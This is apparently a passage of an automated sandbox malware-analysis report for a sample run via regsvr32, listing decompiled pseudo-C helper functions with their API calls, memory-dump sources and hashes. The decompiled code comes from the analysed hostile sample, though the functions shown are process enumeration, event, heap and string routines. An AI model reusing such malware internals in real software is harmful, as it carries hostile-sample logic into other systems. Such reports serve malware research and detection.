                                                                                                                                                                                                                                    0x023e75d7
                                                                                                                                                                                                                                    0x023e75e3
                                                                                                                                                                                                                                    0x023e75e8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 023E758F
                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 023E75A2
                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 023E75CE
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 023E75DD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                    • Opcode ID: 2f934a7158a6da7c7e29ccab47129f5f1a645e83e67d5f42b9a9d94d3722861b
                                                                                                                                                                                                                                    • Instruction ID: b9b2a68196d575f175da2043b6123f1006d3c5ba2ca2fed363eb681b250b45ec
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f934a7158a6da7c7e29ccab47129f5f1a645e83e67d5f42b9a9d94d3722861b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FF09072A01139EADF30A6768C49EEBB6ADDBC4710F000061FA17D60C0EB24CA5DCAA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E7C61, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E7C61(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                                                                                                                                                                                                    0x023e7c6b
                                                                                                                                                                                                                                    0x023e7c6f
                                                                                                                                                                                                                                    0x023e7c84
                                                                                                                                                                                                                                    0x023e7c88
                                                                                                                                                                                                                                    0x023e7c8b
                                                                                                                                                                                                                                    0x023e7c91
                                                                                                                                                                                                                                    0x023e7c95
                                                                                                                                                                                                                                    0x023e7c98
                                                                                                                                                                                                                                    0x023e7ca3
                                                                                                                                                                                                                                    0x023e7c9a
                                                                                                                                                                                                                                    0x023e7c9a
                                                                                                                                                                                                                                    0x023e7c9a
                                                                                                                                                                                                                                    0x023e7c98
                                                                                                                                                                                                                                    0x023e7cb1

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E7C6F
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,76D681D0), ref: 023E7C84
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 023E7C91
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 023E7CA3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandlememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2812548120-0
                                                                                                                                                                                                                                    • Opcode ID: 6c28087cdf98e046076645a39d1f49bf6278756fc844495d12db26a368bd00b6
                                                                                                                                                                                                                                    • Instruction ID: 9bf174de2ce52cac79f660dda7918243919c346e821bebafb9415661c2b7db0f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c28087cdf98e046076645a39d1f49bf6278756fc844495d12db26a368bd00b6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF0FEF5504308BFEB205F66DCC1C2BBBACFB852D9B11892EF04781581D632E81D8AB1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D1850, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E026D1850() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x26d4130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x26d413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x26d412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x26d4128 = _t5;
						 *0x26d4130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x26d4124 = _t6;
						if(_t6 == 0) {
							 *0x26d4124 =  *0x26d4124 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                                                                                                                                                                                                    0x026d1851
                                                                                                                                                                                                                                    0x026d185f
                                                                                                                                                                                                                                    0x026d1867
                                                                                                                                                                                                                                    0x026d186c
                                                                                                                                                                                                                                    0x026d18be
                                                                                                                                                                                                                                    0x026d18be
                                                                                                                                                                                                                                    0x026d186e
                                                                                                                                                                                                                                    0x026d1876
                                                                                                                                                                                                                                    0x026d187e
                                                                                                                                                                                                                                    0x026d187e
                                                                                                                                                                                                                                    0x026d18ba
                                                                                                                                                                                                                                    0x026d18bc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1878
                                                                                                                                                                                                                                    0x026d187a
                                                                                                                                                                                                                                    0x026d1880
                                                                                                                                                                                                                                    0x026d1880
                                                                                                                                                                                                                                    0x026d1885
                                                                                                                                                                                                                                    0x026d1893
                                                                                                                                                                                                                                    0x026d1898
                                                                                                                                                                                                                                    0x026d189e
                                                                                                                                                                                                                                    0x026d18a6
                                                                                                                                                                                                                                    0x026d18ab
                                                                                                                                                                                                                                    0x026d18ad
                                                                                                                                                                                                                                    0x026d18ad
                                                                                                                                                                                                                                    0x026d18b7
                                                                                                                                                                                                                                    0x026d187c
                                                                                                                                                                                                                                    0x026d187c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d187c
                                                                                                                                                                                                                                    0x026d187a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,026D164B,76D263F0), ref: 026D185F
                                                                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 026D186E
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 026D1885
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 026D189E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 845504543-0
                                                                                                                                                                                                                                    • Opcode ID: 00dd6d7f9787841c2404f7b2f322eb0ce83b9caf32b4adf96a19070ea9920b4d
                                                                                                                                                                                                                                    • Instruction ID: 32eed8dd1937b660845d881b42d7e21b3281eca972283f5ad7c1fe0f8b2f7d00
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00dd6d7f9787841c2404f7b2f322eb0ce83b9caf32b4adf96a19070ea9920b4d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4F04F71EC22189BE720DF68BD4A7AC3BA4E707712F405A95E548E62C4DBB048E18F59
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E970F, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E970F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x23ed26c; // 0x2cc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x23ed2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x23ed26c; // 0x2cc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x23ed238; // 0x48d0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                                                                                                                                                                    0x023e970f
                                                                                                                                                                                                                                    0x023e9716
                                                                                                                                                                                                                                    0x023e9760
                                                                                                                                                                                                                                    0x023e9762
                                                                                                                                                                                                                                    0x023e9762
                                                                                                                                                                                                                                    0x023e971a
                                                                                                                                                                                                                                    0x023e9720
                                                                                                                                                                                                                                    0x023e9725
                                                                                                                                                                                                                                    0x023e9729
                                                                                                                                                                                                                                    0x023e972f
                                                                                                                                                                                                                                    0x023e9736
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e9738
                                                                                                                                                                                                                                    0x023e973d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e973d
                                                                                                                                                                                                                                    0x023e973f
                                                                                                                                                                                                                                    0x023e9747
                                                                                                                                                                                                                                    0x023e974a
                                                                                                                                                                                                                                    0x023e974a
                                                                                                                                                                                                                                    0x023e9750
                                                                                                                                                                                                                                    0x023e9757
                                                                                                                                                                                                                                    0x023e975a
                                                                                                                                                                                                                                    0x023e975a
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(000002CC,00000001,023E8099), ref: 023E971A
                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 023E9729
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000002CC), ref: 023E974A
                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32(048D0000), ref: 023E975A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4109453060-0
                                                                                                                                                                                                                                    • Opcode ID: 7364cde10573cb49cc87baed26b2762fcc34f67ed6d6e2566f9324d84ef78210
                                                                                                                                                                                                                                    • Instruction ID: 1c5ab5468343fb91441167e899d657c4081cc576b58fdefa2a077645eea0c6d4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7364cde10573cb49cc87baed26b2762fcc34f67ed6d6e2566f9324d84ef78210
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF058F0F95328CBDF30AE35A889B0A37ACAB00760F040E00E816DF2C0DB20E85C9650
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E75E9, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E023E75E9(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x23ed32c; // 0x4cc95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x23ed32c; // 0x4cc95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x23ed030) {
					HeapFree( *0x23ed238, 0, _t8);
				}
				_t14[1] = E023E94A9(_v0, _t14);
				_t11 =  *0x23ed32c; // 0x4cc95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                                                                                                                                                                                                    0x023e75e9
                                                                                                                                                                                                                                    0x023e75e9
                                                                                                                                                                                                                                    0x023e75f2
                                                                                                                                                                                                                                    0x023e7602
                                                                                                                                                                                                                                    0x023e7602
                                                                                                                                                                                                                                    0x023e7607
                                                                                                                                                                                                                                    0x023e760c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e75fc
                                                                                                                                                                                                                                    0x023e75fc
                                                                                                                                                                                                                                    0x023e760e
                                                                                                                                                                                                                                    0x023e7612
                                                                                                                                                                                                                                    0x023e7624
                                                                                                                                                                                                                                    0x023e7624
                                                                                                                                                                                                                                    0x023e7634
                                                                                                                                                                                                                                    0x023e7637
                                                                                                                                                                                                                                    0x023e763c
                                                                                                                                                                                                                                    0x023e7640
                                                                                                                                                                                                                                    0x023e7646

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(04CC9570), ref: 023E75F2
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,023E23DE), ref: 023E75FC
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,023E23DE), ref: 023E7624
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(04CC9570), ref: 023E7640
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                    • Opcode ID: f673feb2765994800bdb13b756f6582188f56fd4a846387ab1460cd1d26a0e40
                                                                                                                                                                                                                                    • Instruction ID: 3c8baf48fb9d2075702dad3ce71f03871afb53bc6bee7c34dc7d669a92ba3958
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f673feb2765994800bdb13b756f6582188f56fd4a846387ab1460cd1d26a0e40
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24F0B2B5A80251DBEE64DB69D849B1AB7ACAF14744F048C06F802DA2D1D760EC29CB25
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023EA5D6, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E023EA5D6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x23ed32c; // 0x4cc95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x23ed32c; // 0x4cc95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x23ed32c; // 0x4cc95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x23ee836) {
					HeapFree( *0x23ed238, 0, _t10);
					_t7 =  *0x23ed32c; // 0x4cc95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                                                                                                                                                                    0x023ea5d6
                                                                                                                                                                                                                                    0x023ea5df
                                                                                                                                                                                                                                    0x023ea5ef
                                                                                                                                                                                                                                    0x023ea5ef
                                                                                                                                                                                                                                    0x023ea5f4
                                                                                                                                                                                                                                    0x023ea5f9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023ea5e9
                                                                                                                                                                                                                                    0x023ea5e9
                                                                                                                                                                                                                                    0x023ea5fb
                                                                                                                                                                                                                                    0x023ea600
                                                                                                                                                                                                                                    0x023ea604
                                                                                                                                                                                                                                    0x023ea617
                                                                                                                                                                                                                                    0x023ea61d
                                                                                                                                                                                                                                    0x023ea61d
                                                                                                                                                                                                                                    0x023ea626
                                                                                                                                                                                                                                    0x023ea628
                                                                                                                                                                                                                                    0x023ea62c
                                                                                                                                                                                                                                    0x023ea632

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(04CC9570), ref: 023EA5DF
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,023E23DE), ref: 023EA5E9
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,023E23DE), ref: 023EA617
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(04CC9570), ref: 023EA62C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                    • Opcode ID: f0715879e969872cde5ddec3f7178232aa08243a4c169b4de00cf0dc98660b14
                                                                                                                                                                                                                                    • Instruction ID: 1d62519ca506c8fbf58ad09e1cc749a80206551e9cebacb6c49f9a1691c6a60d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0715879e969872cde5ddec3f7178232aa08243a4c169b4de00cf0dc98660b14
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF0B2F4A80100DBEF288B24E859B1977ACAB08701F04880AF802DF3D0C734EC28CA24
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E7F27, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                    			E023E7F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E023E2049(_t2);
				if(_t34 != 0) {
					_t30 = E023E2049(_t28);
					if(_t30 == 0) {
						E023E9039(_t34);
					} else {
						_t39 = _a4;
						_t22 = E023EA911(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E023EA911(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                                                                                                                                                                    0x023e7f27
                                                                                                                                                                                                                                    0x023e7f31
                                                                                                                                                                                                                                    0x023e7f33
                                                                                                                                                                                                                                    0x023e7f39
                                                                                                                                                                                                                                    0x023e7f39
                                                                                                                                                                                                                                    0x023e7f42
                                                                                                                                                                                                                                    0x023e7f46
                                                                                                                                                                                                                                    0x023e7f52
                                                                                                                                                                                                                                    0x023e7f56
                                                                                                                                                                                                                                    0x023e7fca
                                                                                                                                                                                                                                    0x023e7f58
                                                                                                                                                                                                                                    0x023e7f58
                                                                                                                                                                                                                                    0x023e7f5c
                                                                                                                                                                                                                                    0x023e7f63
                                                                                                                                                                                                                                    0x023e7f66
                                                                                                                                                                                                                                    0x023e7f80
                                                                                                                                                                                                                                    0x023e7f6f
                                                                                                                                                                                                                                    0x023e7f6f
                                                                                                                                                                                                                                    0x023e7f73
                                                                                                                                                                                                                                    0x023e7f76
                                                                                                                                                                                                                                    0x023e7f7b
                                                                                                                                                                                                                                    0x023e7f7b
                                                                                                                                                                                                                                    0x023e7f85
                                                                                                                                                                                                                                    0x023e7fad
                                                                                                                                                                                                                                    0x023e7fb3
                                                                                                                                                                                                                                    0x023e7fb6
                                                                                                                                                                                                                                    0x023e7f87
                                                                                                                                                                                                                                    0x023e7f89
                                                                                                                                                                                                                                    0x023e7f91
                                                                                                                                                                                                                                    0x023e7f9c
                                                                                                                                                                                                                                    0x023e7fa1
                                                                                                                                                                                                                                    0x023e7fa1
                                                                                                                                                                                                                                    0x023e7fbd
                                                                                                                                                                                                                                    0x023e7fc4
                                                                                                                                                                                                                                    0x023e7fc5
                                                                                                                                                                                                                                    0x023e7fc5
                                                                                                                                                                                                                                    0x023e7f56
                                                                                                                                                                                                                                    0x023e7fd5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000008,?,76D24D40,?,?,023E15A4,?,?,?,?,00000102,023E11DA,?,?,00000000), ref: 023E7F33
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                      • Part of subcall function 023EA911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,023E7F61,00000000,00000001,00000001,?,?,023E15A4,?,?,?,?,00000102), ref: 023EA91F
                                                                                                                                                                                                                                      • Part of subcall function 023EA911: StrChrA.SHLWAPI(?,0000003F,?,?,023E15A4,?,?,?,?,00000102,023E11DA,?,?,00000000,00000000), ref: 023EA929
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,023E15A4,?,?,?,?,00000102,023E11DA,?), ref: 023E7F91
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 023E7FA1
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 023E7FAD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3767559652-0
                                                                                                                                                                                                                                    • Opcode ID: 707d983753915d948f24d1ccc60dc5a4d057bd0b267f59845251e07bffda1ab5
                                                                                                                                                                                                                                    • Instruction ID: 2e5107b4c4756b9223c6e4d1f4ec209a7617993e6412b0df5d3f398d31c75a2f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 707d983753915d948f24d1ccc60dc5a4d057bd0b267f59845251e07bffda1ab5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9721C072404329EBCF229FA5D844AAEBFAEAF05384F054055F8069B281D731CE19CBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E7CB8, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E7CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E023E2049(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                                                                                                                                                                    0x023e7ccd
                                                                                                                                                                                                                                    0x023e7cd1
                                                                                                                                                                                                                                    0x023e7cdb
                                                                                                                                                                                                                                    0x023e7ce2
                                                                                                                                                                                                                                    0x023e7ce5
                                                                                                                                                                                                                                    0x023e7ce7
